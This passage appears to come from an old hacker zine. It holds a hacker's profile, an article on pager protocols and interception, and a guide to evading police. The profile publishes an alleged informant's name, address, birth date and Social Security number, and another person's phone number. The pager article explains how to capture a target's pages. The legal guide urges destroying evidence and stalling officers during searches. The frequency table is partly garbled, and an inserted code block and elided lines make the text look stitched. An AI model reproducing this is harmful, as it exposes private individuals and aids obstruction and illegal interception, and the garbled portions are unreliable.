of my sister’s tapes, before I even heard them. But now I like the
music too. 


Eventually, I found a local pirate board, met all the local 
pirates, and got into the warez scene for a while. I joined PE
(Public Enemy), the pirate group. (I cracked the warez!) Warez were
only so fun, so I looked for other stuff. I met some VMB lamers and
got into that scene for about a month, and got bored again.


This was 1990, our 950s were running out, and we needed another 
way to call out. So I took an old VMB hacking program I had 
written, and changed it around to scan for tones, in random order 
to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone- 
Locator. I gave it to some friends (Alexis Machine & Marko Ramius) 
and eventually, it ended up on some warez boards. It got pretty 
popular, so I made a version that worked for more people, called 
it 0.90, and released it. Then I lost the source in a hard drive 
crash, and stopped working on it. 


I was 18 and mom said it was time to get out of her house, so 
I got my own apartment. Marko Ramius and I learned about trashing
central offices, and gained COSMOS access. We barely knew what
COSMOS was .. I knew I had read about it in old Phrack articles, and
I remembered that it was "elite." Our problem was, we still knew no
other "real" hackers, and we had to learn COSMOS. After trashing
and trashing, we still had no COSMOS manuals. We had to get them
somehow. I can’t say how, I’ll leave it to your imagination.


Marko and I started breaking in buildings and got pretty
good at it. We had about a 60% success rate I would guess. But we
never stole anything -- we just looked for cool information. In
1991, we got caught in a building, and got charged with Criminal
Trespassing. We both got probation for a Class A misdemeanor. 
We decided it was time to stop breaking in buildings. 


Late in 1991, I got e-mail on a bulletin board from someone 
named Mucho Maas. He said he had gotten ToneLoc and wanted a 
few new features. I told him I had lost the current source and 
all I had was an old (0.85) source. He said he would take the 
old source, add the new features, and bring it up-to-date with 
the current source. So he did, and we released ToneLoc 0.95. 

If it weren’t for Mucho, ToneLoc would still be at version 0.90, 
and anyone who ran 0.90 knows how hard it was to get it running 
right. 


About the same time, I was getting on a few BBSs in the
Washington DC area. (Pentavia was the best while it was up).
I met several people there... including a guy named Codec. Codec
was mostly a phone phreak, but did a little hacking as well. But
when it came to PBX’s, he was a master. Not only had he exploited
PBXs for free long distance use like the rest of us, but he had
actually REMOVED entire PBX systems from buildings! (See his
article on how to do this, Phrack 43, article 15). But he had
also gotten caught and was on federal probation.


A few months after I met Codec, he had an ’incident’
and was on the run again. I agreed to let him live with me, so
he flew down and moved in. We got a 2 bedroom place, and set
the place up d0pe. There were over 9 phone extensions, (not
including cordless), and about the same number of computers (Most
of which were Codec’s). We had the funnest 3 months ever
but about 2 weeks after SummerCon 1992, we got arrested.


Favorite things 


Women: w0w
Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys, 
Jane’s Addiction. 
Favorite Book: 1984 
My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360 
horsepower. It’s fucking fast. 
Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs, 
The Lost Boys, Near Dark, Hardware. 
Favorite TV: MacGyver 


What are some of your most memorable experiences? 


Being polygraphed by the Secret Service in 1991 for something having 
to do with some lamer threatening the president on an Alliance
Teleconference. I failed the polygraph the first time, then I
passed it the second time. (How’s that for the government?) 
Eventually, some other 15-year old got probation for doing it. 


Being arrested with Codec in 1992. He ran, outran the cops, jumped 
a fence about 8 feet tall, and eventually got in a struggle with
a cop over his gun (Officer Sheldon Salsbury, Austin PD). The
gun went off, and we were both booked on attempted capital murder. 
It turned out that the bullet hit no one, and all the blood was from 
the cop hitting himself in the head with his own gun, although the 
cop claims that Codec hit him in the forehead with a 2-meter ham 
radio from like 20 feet away. Right. A search warrant was executed 
on our apartment, and approximately $800,000 worth of AT&T Switching 
equipment was seized from Codec’s closet. It turns out, we were 
narced on and set-up by 


Jon R. Massengale 
6501 Deer Hollow 
Austin, TX 78750 
DOB: 9-7-62 

SSN: 463-92-0306 


Being the first in Texas to have Caller-ID, before it was legally 
available. 


Losing control of my car at 140mph, doing a slow 360 at about 120, 
living through it, and not doing too much damage to my car. 


Good times: 


Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi, 
getting our car towed, then reading the dialups to the towing 
company’s xenix (login: sysadm). Finally getting our Oki 900’s 
to clone/tumble/do other d0pe things. Calling each other on
our Okis from 5 feet away, putting them together and causing
feedback. 


Setting up my apartment with Codec with a 10-station Merlin system, 
and a 9-station network. 


SummerCon 1993. "Culmination of Coolness." Sorry, can’t say any 
more. 


Some People To Mention: 


There are a lot of people who I would like to mention that have helped 
me greatly and who I have known for a very long time: 

Marko Ramius - First pirate/hacker I really knew in person. We
did a lot of crazy shit together. 


Alexis Machine - Second hacker-type I met, and a true Warez Kid. 
(that’s a compliment!)


Mucho Maas - Brought back ToneLoc from the dead. Always told 
me what I shouldn’t do, and always said "I told 
you so" when I got busted. 


Codec - I had some of the funnest times of my life with 
Codec... unfortunately, it was so much fun it was 
illegal, and we got busted. 


Cerebrum - Very cool friend who got narced on by a fuckhead 
named Zach, 206-364-0660. Cerebrum is serving 
a 10 month federal sentence in a nice prison camp 
in Sheridan, Oregon. He gets out about December 
10, 1994. 


The Conflict - Unfortunately, I can’t tell you. Maybe in about 8 
more years. 


ESAC Administrator - "Have you been drinking on the job?" 


What I’m up to now 


When I heard that the next Phrack Pro-phile was going to be about 
me, I realized, "I must be retired". It’s probably true.. at least I hope 
it is. The 5 months I spent in jail was enough. I just started going 
back to University of Texas, where they will only give me a VAX account 
(lame). For the first time in 4 years, I think my life is going in 
the ‘right’ direction. 


Advice 

I can only hope anyone who reads this will take this seriously. 
Here’s my advice: If you ever get arrested or even simply questioned about 
ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement
official or whoever, "I’m sorry, I can’t talk without my lawyer present."
Cooperating will never help you. Codec recently pointed out to me, that
we should be the "role models" of what people should do when they get
busted. Both of us remained loyal and quiet during our whole case. I was
in jail for 5 months, and Codec is still in prison, but we never talked.
Being narced on by a ’buddy’ is the worst thing that could ever happen
to you, and narcing on a ’buddy’ is the worst thing you could do to
them. If you get busted for something, don’t pass the punishment on
to someone else. I hope most of you never have to face this, but if
you do, you will live much better knowing that you didn’t give in to
a bunch of ’law enforcement’ pricks.


BIG FUN


Think Federal District Court Judges and Special 
Agents get to have all the fun? 


Not any more!! 
It’s the Operation Sun Devil Home Game! 


For the first step in the game, a quick flourish of a pen 
signs away your opponent’s rights to any expectations of 
privacy. Bank records, medical records, employment 
files, student records...literally anything is yours
for the taking.


As you progress through the various levels, you move on 
to other legal scenarios like the application for search 
warrant and the summons. 


It’s all here in the Operation Sun Devil Home game, by 
Gailco. 


Other game pieces available via ftp from freeside.com 
in /pub/phrack/gailco. 


Offer not sold in stores. Do not use. 
Impersonating an officer of the court is a felony. 


The Wonderful World of Pagers


by Erik Bloodaxe 


Screaming through the electromagnet swamp we live in are hundreds of 
thousands of messages of varying degrees of importance. Doctors, 
police, corporate executives, housewives and drug dealers all find 
themselves constantly trapped at the mercy of a teeny little box: 
the pager. 


Everyone has seen a pager; almost everyone has one. Over 20 million 
pagers are on the streets in the US alone, sorting out their particular 
chunk of the radio-spectrum. Another fifty-thousand more are
put into service each day.


But what the hell are these things really doing? What more can we 
do with them than be reminded to call mom, or to "pick up dry-cleaning?" 


Lots. 


** PROTOCOLS ** 


Pagers today use a variety of signalling formats such as POCSAG, FLEX
and GOLAY. The most common by far is POCSAG (Post Office Standardization
Advisory Group), a standard set by the British Post Office and adopted 
world-wide for paging. 


POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps. 
Most commercial paging companies today use at least 1200, although many 
companies who own their own paging terminals for in-house use transmit 
at 512. Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send 
the majority of their traffic at 2400 to make the maximum use of
their bandwidth. In other words, the faster they can deliver pages,
the smaller their queue of outgoing pages is. Although these
carriers have upgraded their equipment in the field to broadcast at
2400 (or plan to do so in the near future), they still send out
some pages at 1200 and 512 to accommodate their customers with older
pagers. Most 512 and 1200 traffic on the nationwide services is 
numeric or tone-only pages. 


POCSAG messages are broadcast in batches. Each batch is comprised of 8 
frames, and each frame contains two codewords separated by a
"synchronization" codeword. A message can have as many codewords
as needed to deliver the page and can stretch through several batches
if needed. The end of a complete message is indicated by a "next address"
codeword. Both addressing and user data are sent in the codewords, the
distinction being the least significant bit of the codeword:
0 for address data, and 1 for user-data.


Standard alphanumeric data is sent in a seven-bit format, with each codeword
containing 2 6/7 characters. A newer 8-bit alphanumeric format is
implemented by some carriers, which allows users to send data such as
computer files and graphics in addition to regular alphanumeric messages.
The 8 bit format allows for 2.5 characters per codeword.


Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per 
codeword. Tone and voice pages contain address information only. 




(NOTE: Pager data uses BCH 32,21 for encoding. I don’t imagine 
very many of you will be trying to decode pager data by building your 
own decoders, but for those of you who may, take my interpretation
of POCSAG framing with a grain of salt, and try to dig up the 
actual POCSAG specs.) 


** THE PAGING RECEIVER ** 


Paging receivers come in hundreds of shapes and sizes, although the vast 
majority are manufactured by Motorola. Numeric pagers comprise over 
fifty percent of all pagers in use. Alphanumeric comprises about thirty
percent, with tone and voice pagers making up the remainder. 


Pagers are uniquely addressed by a capcode. The capcode is usually six 
to eight digits in length, and will be printed somewhere on the pager 
itself. Many pager companies assign customers PIN numbers, which are 
then cross-referenced to a given capcode in databases maintained by
the service provider. PIN numbers have no other relationship
to the capcode.


Tone pagers are by far the most limited paging devices in use.
When a specified number has been called, an address only message
is broadcast, which causes the intended receiver to beep. Wow.
Tone pagers usually have 4 capcodes, which can correspond to
different locations to call back. Voice pagers are similar, except
they allow the calling party to leave a 15 to 30 second message.
The voice message is broadcast immediately after the capcode of the
receiver, which unsquelches the device’s audio.


Numeric pagers, although seemingly limited by their lack of display 
options have proven otherwise by enterprising users. Most numeric 
data sent is obviously related to phone numbers, but numerous users 
have developed codes relating to various actions to be carried out 
by the party being paged. The most prolific users of this have 
been the Chinese who have one of the most active paging networks
in the world. I suppose the next biggest users of code-style numeric
paging would be drug dealers. (2112 0830 187 -- get to the fucking
drop site by 8:30 or I’ll bust a cap in your ass!) :)


Alphanumeric pagers are most often contacted through a dedicated 
service that will manually enter in the message to be sent onto the 
paging terminal. One such service, NDC, offers its phone-answering 
and message typing services to various pager companies. Next time 
you are talking to a pager operator, ask him or her if they are at 
NDC. They probably are. 


In addition to the capcode, pagers will have an FCC ID number, a serial 
number, and most importantly, the frequency that the device has been 
crystaled for imprinted on the back of the device. Although technology 
exists that would allow pagers to listen on a number of frequencies
by synthesizing the frequency rather than using a crystal, pager
manufacturers stick to using crystals to "keep the unit cost down." 


Pagers may have multiple capcodes by which they can be addressed.
Multiple capcodes are most often used when a person has subscribed to
various services offered by their provider, or when the subscriber is
part of a group of individuals who will all need to receive the same
page simultaneously (police, EMTs, etc.).


Most low-cost pagers have their capcode stored on the circuit board 
in a PAL. Most paging companies will completely exchange pagers 
rather than remove and reprogram the PAL, so I don’t think
it’s worth it for any experimenter to attempt. However, like most
Motorola devices, many of their paging products can be reprogrammed 
with a special serial cable and software. Reprogramming software 
is usually limited to changing baud rates, and adding capcodes. 


Additionally, some units can be reprogrammed over the air by the 
service provider. Using a POCSAG feature known as OTP (over the air 
programming) the service provider can instruct the paging receiver to
add capcodes, remove capcodes, or even shut itself down in the case
of non-payment. 


** SERVICES **


With the growing popularity of alphanumeric pagers, many service providers 
have decided to branch out into the information business. The most
common of these services is delivery of news headlines. Other services
include stock quotes, airline flight information, voice mail and
fax reception notification, and email. Of course, all of these services
are available for a small additional monthly premium. 


Email is probably the single coolest thing to have sent to your 
alpha pager. (Unless you subscribe to about a zillion mailing lists) 
Companies like SkyTel and Radiomail give the user an email address 
that automatically forwards to your paging device.
IE: PIN-NUMBER@skymail.com. Several packages exist for forwarding
email from a UNIX system by stripping down the email to
pertinent info such as FROM and SUBJECT lines, and executing a script
to send the incoming mail out via a pager terminal data port.
One such program is IXOBEEPER, which can be found with an archie
query.


Radiomail’s founder, (and rather famous ex-hacker in his own right - go 
look at ancient ComputerWorld headlines), Geoff Goodfellow had devised 
such a method back in the late 70’s. His program watched for incoming 
email, parsed the mail headers, and redirected the FROM and SUBJECT 
lines to his alphanumeric pager. Obviously, not many people had 
alphanumeric pagers at all, much less email addresses on ARPANET
back in the 70’s, so Geoff’s email pager idea didn’t see much
wide-spread use until much later. 


Two RFC’s have been issued recently regarding paging and the Internet. 
RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP. 
Upon connecting to the SNPP port the user issues commands such as: 


PAGE followed by pager telephone number 
MESS followed by the alpha or numeric message 
SEND
QUIT


RFC 1568 has met with some opposition in the IETF, who don’t consider 
it worthwhile to implement a new protocol to handle paging, since it 
can be handled easily using other methods. 


The other RFC, number 1569, suggests that paging be addressed in a rather 
unique manner. Using the domain TPC.INT, which would be reserved for 
services that necessitate the direct connection to The Phone Company, 
individual pagers would be addressed by their individual phone numbers. 
Usernames would be limited to pager-alpha or pager-numeric to represent
the type of pager being addressed. For example, an alpha-page being sent to
1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tpc.int.


** PAGING TERMINAL DATA PORTS ** 


Many services offer modem connections to pager terminals so that
computer users can send pages from their desks using software packages
like WinBeep, Notify! or Messenger. All of these services connect to
the pager terminal and speak to it using a protocol known as
IXO.


Upon connection, a pager terminal identifies itself with the following: 


ID= 


(I bet you always wondered what the hell those systems were) 
Paging terminals default to 300 E71, although many larger companies
now have dialups supporting up to 2400.


... the ID= prompt. Not every pager terminal will support a manual ...
...ly enter in the appropriate information ... The system will then ...
followed by a prompt ... followed by a final prompt asking if you ...


All terminals support the IXO protocol. As there are far too many
site specific examples within the breadth of IXO, we will concentrate on
the most common type of pager services for our examples.


[ Sample IXO transaction of a program sending the message ABC to PIN 123
gleaned from the IXOBeeper Docs ]


Pager Terminal                   YOU

                                 <CR>
ID=
                                 <ESC>PG1<CR>
Processing - Please Wait
<CR>
<CR>
ACK <CR>
<ESC>[p <CR>
                                 <STX>123<CR>
                                 ABC<CR>
                                 <ETX>17;<CR>
<CR>
ACK <CR>
                                 <EOT><CR>
<ESC>EOT <CR>


The checksum data came from:


STX     000 0010
1       011 0001
2       011 0010
3       011 0011
<CR>    000 1101
A       100 0001
B       100 0010
C       100 0011
<CR>    000 1101
ETX     000 0011
----------------
      1 0111 1011

      1    7    ;    Get it? Get an ASCII chart and it will all make sense.


Note: Everything in the paging blocks, from STX to ETX inclusive is used
to generate the checksum. Also, this is binary data, guys...you can’t
just type at the ID= prompt and expect to have it recognized as IXO.
It wants specific BITS.
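The block layout and checksum from the sample transaction, as an added example (not code from the article or from the IXOBeeper docs): it builds the <STX>PIN<CR>message<CR><ETX>checksum<CR> block and validates one the way a receiving terminal would. The function names are made up for this example, and the encoding of each 4-bit group as 0x30 plus its value is inferred from the sample's "17;".

```python
# Added example: IXO paging block framing and checksum.
# Function names are hypothetical; the sample values (PIN 123, message ABC,
# checksum "17;") are the ones shown in the article's transaction.

STX, ETX, CR = 0x02, 0x03, 0x0D


def ixo_checksum(body: bytes) -> bytes:
    """Checksum of one block, computed over STX..ETX inclusive.

    Each byte contributes its low 7 bits (the link runs 7 data bits).
    The low 12 bits of the sum are sent as three characters, most
    significant group first, each 4-bit group offset by 0x30.
    Assumption: this encoding is inferred from the article's sample,
    where the sum 379 = 0x17B goes out as "17;".
    """
    total = sum(b & 0x7F for b in body) & 0xFFF
    return bytes(0x30 + ((total >> shift) & 0xF) for shift in (8, 4, 0))


def _field(name: str, value: str) -> bytes:
    """Encode one field, refusing anything that would break the framing."""
    data = value.encode("ascii")  # non-ASCII raises UnicodeEncodeError
    if any(b < 0x20 or b > 0x7E for b in data):
        # An embedded CR, STX or ETX would let a field spill into the next.
        raise ValueError(f"{name} contains a control character")
    return data


def build_block(pin: str, message: str) -> bytes:
    """Return <STX>pin<CR>message<CR><ETX>checksum<CR> as raw bytes."""
    body = (bytes([STX]) + _field("pin", pin) + bytes([CR])
            + _field("message", message) + bytes([CR, ETX]))
    return body + ixo_checksum(body) + bytes([CR])


def parse_block(block: bytes) -> tuple[str, str]:
    """Validate a received block and return (pin, message).

    Raises ValueError on bad framing or a checksum mismatch, which is
    why text typed by hand at the ID= prompt is not accepted as IXO.
    """
    if (len(block) < 8 or block[0] != STX
            or block[-1] != CR or block[-5] != ETX):
        raise ValueError("bad framing")
    body, received = block[:-4], block[-4:-1]
    expected = ixo_checksum(body)
    if received != expected:
        raise ValueError(f"checksum mismatch: got {received!r}, "
                         f"expected {expected!r}")
    fields = body[1:-1].split(bytes([CR]))
    if len(fields) != 3 or fields[2] != b"":
        raise ValueError("expected exactly two CR-terminated fields")
    return fields[0].decode("ascii"), fields[1].decode("ascii")


if __name__ == "__main__":
    block = build_block("123", "ABC")
    print(block)               # the article's sample block as raw bytes
    print(parse_block(block))  # the PIN and message recovered from it
```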


Got it? Just checking...


** PAGER FREQUENCIES - US **


[Frequencies transmitting pager information are extremely easy to
identify while scanning. They identify each batch transmission
with a two-tone signal, followed by bursts of data. People with
scanners may tune into some of the following frequencies to
familiarize themselves with this distinct audio.]


Voice Pager Ranges:    152.01   - 152...
                       453.025  - 453...
                       454.025  - 454.65
                       462.75   - 462.925
Other Paging Ranges:   35.202   - 35.68
                       43.20    - 43.68
                       152.51   - 152.84
                       ...      - 158.07
                       158.49   - 158.64
                       459.025  - 459.625
                       929.0125 - 931.9875


** PAGER FREQUENCIES - WORLD ** 


Austria        162.050 - 162.075       T,N,A
Australia      148.100 - 166.540       T,N,A
               411.500 - 511.500       T,N,A
Canada         929025: = 981-975       T,N,A
               138-0025) = V7. 975     T,N,A
               406.025 - 511.975       T,N,A
China          SZ 2000" = dih2e SS     N,A
Denmark        469.750                 N,A
Finland        450.225                 T,N,A
               146.275 - 146.325       T,N,A
France         466.025 - 466.075       T,N,A
Germany        465.970 - 466.075       T,N,A
               173.200                 T,N,A
Hong Kong      172.525                 N,A
               280.0875                T,N,A
Indonesia      T5L.275> = °153::050    A
Ireland        153.000 - 153.825       T,N,A
Italy          466.075                 T,N,A
               161.175                 T,N
Japan          278.1625 - 283.8875     T,N
Korea          146.320 - 173.320       T,N,A
Malaysia       POZeLO, = 12.525        N,A,V
               937...93;75             N,A
Netherlands    156.9865 - 164.350      T,N,A
New Zealand    157.925 - 158.050       T,N,A
Norway         148.050 - 169.850       T,N,A
Singapore      161.450                 N,A
               931.9395                N,A
Sweden         169.8                   T,N,A
Switzerland    149.5                   T,N,A
Taiwan         166.775                 N,A
               280.9375                N,A
Thailand       450.525                 N,A
               172.525 - 173.475       N,A
UK             1382150 - 153.275       T,N,A
               454.675 - 466.075       T,N,A

T = Tone
N = Numeric
A = Alphanumeric
V = Voice


** INTERCEPTION AND THE LAW ** 




For many years the interception of pages was not considered an 
invasion of privacy because of the limited information provided 
by the tone-only pagers in use at the time. In fact, when 
Congress passed the Electronic Communications Privacy Act in 1986 
tone-only pagers were exempt from its provisions. 


According to the ECPA, monitoring of all other types of paging signals,
including voice, is illegal. But, due to this same law, paging
transmissions are considered to have a reasonable expectation of
privacy, and Law Enforcement officials must obtain a proper court
order to intercept them, or have the consent of the subscriber.


To intercept pages, many LE-types will obtain beepers programmed with
the same capcode as their suspect. To do this, they must contact
the paging company and obtain the capcode associated with the person
or phone number they are interested in. However, even enlisting
the assistance of the paging companies often requires following
proper legal procedures (warrants, subpoenas, etc.).


More sophisticated pager-interception devices are sold by a variety
of companies. SWS Security sells a device called the "Beeper Buster"
for about $4000.00. This particular device is scheduled as
a Title III device, so any possession of it by someone outside
a law enforcement agency is a federal crime. Greyson Electronics
sells a package called PageTracker that uses an ICOM R7100
in conjunction with a personal computer to track and decode pager
messages. (Greyson also sells a similar package to decode
AMPS cellular messages from forward and reverse channels called
"CellScope.")


For the average hacker-type, the most realistic and affordable option
is the Universal M-400 decoder. This box is about 400 bucks and
will decode POCSAG at 512 and 1200, as well as GOLAY (although I’ve never
seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF,
Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. It
takes audio input from any scanner’s external speaker jack, and
is probably the best decoder available to the Hacker/HAM for the price.


Output from the M400 shows the capcode followed by T, N or A (tone, numeric
or alpha) ending with the message sent. Universal suggests hooking
the input to the decoder directly to the scanner before any de-emphasis
circuitry, to obtain the true signal. (Many scanners alter the audio
before output for several reasons that aren’t really relevant to this
article...they just do. :) )


Obviously, even viewing the pager data as it streams by is of little
use to anyone without knowing to whom the pager belongs. Law Enforcement
can get a subpoena and obtain the information easily, but anyone else
is stuck trying to social engineer the paging company. One other alternative
works quite well when you already know the individual’s pager number,
and need to obtain the capcode (for whatever reason).


Pager companies will buy large blocks in an exchange for their customers.
It is extremely easy to discover the paging company from the phone number
that corresponds to the target pager either through the RBOC or by paging
someone and asking them who their provider is when they return your call.
Once the company is known, the frequencies allocated to that company
are registered with the FCC and are public information. Many CD-ROMs
are available with the entire FCC Master Frequency Database.
(Percon sells one for 99 bucks that covers the whole country -
716-386-6015) Libraries and the FCC itself will also have this information
available.


With the frequency set and a decoder running, send a page that will be 
incredibly easy to discern from the tidal wave of pages spewing 
forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...) 
It will eventually scroll by, and presto! How many important people 
love to give you their pager number? 


** THE FUTURE **


With the advent of new technologies pagers will become even more
present in both our businesses and private lives. Notebook computers
and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
Some of these cards have actual screens that allow for use without the
computer, but most require a program to pull message data out. These
cards also have somewhat large storage capacity, so messages
have the option of being fairly large, should the service
provider allow them to be.


With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
can expect to receive usable computer data such as spreadsheet
entries, word processing documents, and of course, GIFs. (Hey, porno
entrepreneurs: beeper-porn! Every day, you get a new gif sent to your
pagecard! Woo Woo. Sad thing is, it would probably sell.)


A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A 
Roaming Computer) was one of the first to allow for such broadcasts. 
EMBARC makes use of a proprietary Motorola protocol, rather than 
POCSAG, so subscribers must make use of either a Motorola NewsStream 
pager (with nifty serial cable) or a newer PCMCIA pager. Messages are
sent to (and received by) the user through the use of special client 
software. 


The software dials into the EMBARC message switch accessed through
AT&T’s ACCUNET packet-switched network. The device itself is used
for authentication (most likely its capcode or serial number)
and some oddball protocol is spoken to communicate with the switch.


Once connected, users have the option of sending a page out, or 
retrieving pages either too large for the memory of the pager, or 
from a list of all messages sent in the last 24 hours, in case the 
subscriber had his pager turned off. 


Additionally, the devices can be addressed directly via X.400
addresses. (X.400: The CCITT standard that covers email addresses
far too long to be worth sending anyone mail to.) So essentially,
any EMBARC customer can be contacted from the Internet.


MTEL, the parent company of the huge paging service SkyTel, is
implementing what may be the next generation of paging technologies.
This service, NWN, being administrated by MTEL subsidiary Destineer,
is most often called 2-way paging, but is more accurately Narrowband-PCS.


The network allows for the "pager" to be a transceiver. When a page
arrives, the device receiving the page will automatically send back
an acknowledgment of its completed reception. Devices may also
send back some kind of "canned response" the user programs. An example
might be: "Thanks, I got it!" or "Why on Earth are you eating up my
allocated pages for the month with this crap?"


MTEL’s service was awarded a Pioneers Preference by the FCC, which gave them
access to the narrowband PCS spectrum before the auctions. This is a big
deal, and did not go unnoticed by Microsoft. They dumped cash into the
network, and said the devices will be supported by Chicago. (Yeah,
along with every other device on the planet, right? Plug and Pray!)


The network will be laid out almost identically to MTEL’s existing paging
network, using dedicated lines to connect towers in an area to a central
satellite up/downlink. One key difference will be the addition of
highly somewhat sensitive receivers on the network, to pick up the ACKs
and replies of the customer units, which will probably broadcast at
about 2 or 3 watts. The most exciting difference will be the
speed at which the network transmits data: 24,000 Kbps. Twenty-four
thousand. (I couldn’t believe it either. Not only can you get your
GIFs sent to your pager, but you get them blinding FAST!) The actual
units themselves will most likely look like existing alphanumeric pagers
with possibly a few more buttons, and of course, PCMCIA units will
be available to integrate with computer applications.


Beyond these advancements, other types of services plan on offering
paging-like features. CDPD, TDMA & CDMA Digital Cellular and ESMR
all plan on providing a "pager-like" option for their customers.
The mere fact that you can walk into a K-Mart and buy a pager
off a rack would indicate to me that pagers are far too ingrained into
our society, and represent a wireless technology that doesn’t scare
or confuse the yokels. Such a technology doesn’t ever really go away.


Legal Info
by Szechuan Death


OK. This document applies only to United States citizens: if 
you are a citizen of some other fascist country, don’t come whining 
to me when this doesn’t work..... =) 


Make no mistake: I’m not a lawyer. I’ve merely paid 
attention and picked up some facts that might be useful to me along 
the way. There are three subjects that it pays to have a knowledge
of handy: prescription drugs, medical procedures, and legal facts. 
While these may all be boring as hell, they can certainly pull your 
ass out of the fire in a pinch. 


Standard disclaimer: I make no claims about this document or
facts contained therein. I also make no claims about their legal
authenticity: if you want to be 100% sure, there’s a library in
damn near every town, LOOK IT UP!


One more thing: This document is useful for virtually 
ANYTHING. Its effectiveness stretches far beyond computer hacking
(although it’s worn a bit thin for serious crimes, as every cretin 
on Death Row has tried it already.....:) 


OK. Let’s say, just for the sake of argument, that you’ve 
decided to take a walk along the wild side and do something 
illegal. For our purposes, let’s say computer hacking (imagine 
that). There are many things you can do to cover your legal ass,
should your activities come to the attention of any of our various 
friendly law-enforcement agencies nationwide. 


--- Part 1: Police Mentality


You must understand the police, if you ever want to be able to 
thwart them and keep your freedom. Most police, to survive in 
their jobs, have developed an "Us vs. Them" attitude, which we 
should tolerate (up to a point). They use this attitude to justify 
their fascist tactics. "Us" is the police, a brotherhood that 
keeps the peace, always does right, and never snitches on each 
other, no matter what the cause. "Them" is the rest of the 
population. If "They" are not guilty of a specific crime, they 
must have done something else, and they’re doing their damndest to 
avoid getting caught. In addition, many police have cultivated an 
attitude similar to that of a 15-year-old high school punk: "I’m 
bad, I’m bad, I’m SOOOOO bad, I Am Cop, Hear Me ROAR," etc. 
Unfortunately, these people have weapons and the authority to 
support that attitude. Therefore, if the police come to your 
house, be EXTREMELY polite and subservient; now is not the time to 
start spouting your opinion about the police state in America 
today. Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides 
adding a charge of "Resisting Arrest" and/or "Assaulting an 
Officer", it can get very dangerous. The police have been trained 
in a number of suspect-control techniques, most of which involve 
twisting body parts at unnatural angles. As if this weren’t
enough, almost all police carry guns. Start fighting and you’ll
get a couple broken bones, torn ligaments, or worse, a few bullet
wounds (possibly fatal). So remember, be very meek. Show them
that you are cowed by their force and their blustering presence,
and this will save you a black eye or two on the way down to the
station (from tripping and falling, of course).


--- Part 2: Hacker’s Security


CARDINAL RULE #1: Get rid of the evidence. No evidence = no case
for the prosecutor. The Novice Hacker’s Guide from LOD has an
excellent way to put this:


Don’t be afraid to be paranoid. Remember, you *are* breaking the law.
It doesn’t hurt to store everything encrypted on your hard disk, or
keep your notes buried in the backyard or in the trunk of your car.
You may feel a little funny, but you’ll feel a lot funnier when you
meet Bruno, your transvestite cellmate who axed his family to death.


... hints:

... all your essential printouts, or burn them if they’re trash
(remember: police need no warrant to search your trash). Encrypt
the files on your hard drive with something nasty, like PGP or RSA.
Use a file-wiper, NOT delete, to get rid of them when you’re done.
And WIPE, don’t FORMAT, your floppies and other magnetic media
(better still, degauss them). With a little common sense and a bit
of effort, a great deal of legal headaches can be avoided.


--- Part 3A: Polite Entry


Next part. You and your friends are enjoying an evening of
trying to polevault the firewall on whitehouse.com, when suddenly
you hear a knock at the door. Opening the door, you find a member
of the local police force standing outside, asking if he can come
in and ask you some questions. Now, here’s where you start to piss
your pants. If you were smart, you’ll have arranged something
beforehand where your friends (or, if there ARE no friends present,
an automatic script) are getting rid of the evidence as shown in
Part 2. If you have no handy means of destroying the data
(printouts, floppies, tapes, etc.), throw the whole mess into
the bathtub, soak it in lighter fluid, and torch it. It’s a
helluva mess to clean up, but nothing compared to latrine duty at
the nearest federal prison.


While the evidence is being destroyed, you’re stalling the
police. Ask to see their search warrant and IDs. Mull over each
and every one of them for at least 5 minutes. If they have none,
start screaming about your 4th Amendment rights. Most importantly:
DON’T INVITE THEM IN. They’re like vampires: if you let them in,
you’re fucked. If they see anything even REMOTELY incriminating,
that constitutes probable cause for a search and they’ll be
swarming all over your house like flies on shit. (And guess what!
It’s legal, because YOU LET THEM IN!) Now, be aware that this
won’t stall them forever: they can simply wait outside the house
and radio in a request for a search warrant, which will probably be
signed by the judge on duty at that time. Remember: "If you’re
not willing to be searched, you MUST have something to hide!" If
there are no friends assisting you, as shown above, USE THIS TIME
EFFECTIVELY. When they get the warrant signed, that will be too
late, because you’ll have erased/shredded/burned/hidden/etc. all
the incriminating evidence.


--- Part 3B: And Suddenly, The Door Burst In


Now, if the police already have a search warrant, they don’t
have to knock on the door. They can simply kick the door down and
come in. If you’re there at the time, you CAN try and stall them
as shown above, by asking to see their search warrant and IDs.
This may not work now, because they have you cold, hard, and dead
to rights. And, if anything incriminating is in a place where they
can find it, you’re fucked, because it WILL be used as evidence.
But this won’t happen to you, because you’ve already put everything
you’re not using right at the moment in a safe, HIDDEN, place.


This leaves the computer. If you hear them kicking the door
in, keep calm, and run a script you’ve set up beforehand to low- 
level-format the drive, wipe all hacking files, encrypt the whole 
thing, etc. If there’s any printouts or media hanging out, try and 
hide them (probably worthless anyway, but worth a try). The name 
of the game now is to minimize the damage that can be done to you. 
The less hard evidence linking you to the "crime", the less of a 
case the prosecutor will have and the better off you’ll be. 


--- Part 4: The Arrest


Now is the time to kick all your senses into hyper-record 
mode. For you to get processed through the system without a hitch, 
the arrest has to go perfectly, by the numbers. One small slip and 
you’re out through a loophole. Now, the police are aware of this 
and will be doing their best to see that doesn’t happen, but you 
may get lucky all the same. First of all: According to the 
Miranda Act, the police are REQUIRED BY LAW to read you your rights 
and make sure you understand them. Remember EVERY WORD THEY SAY TO 
YOU. If they don’t say it correctly, you may be able to get off on 
a technicality. 


CARDINAL RULE #2: You have the right to remain silent. 
EXERCISE IT. This cannot be stressed enough. If you need a 
reminder, listen to the first part of the Miranda Warning: 


"You have the right to remain silent. If you give up that 
